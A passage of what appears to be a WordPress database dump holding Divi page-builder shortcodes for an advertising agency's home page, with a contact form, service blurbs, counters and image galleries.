button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-04 19:27:44','2020-08-04 19:27:44','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/04/134-revision-v1/',0,'revision','',0),(419,1,'2020-08-04 20:09:46','2020-08-04 20:09:46','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/63368-2.png\" alt=\"Why We\" title_text=\"Best Agency to choose\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" 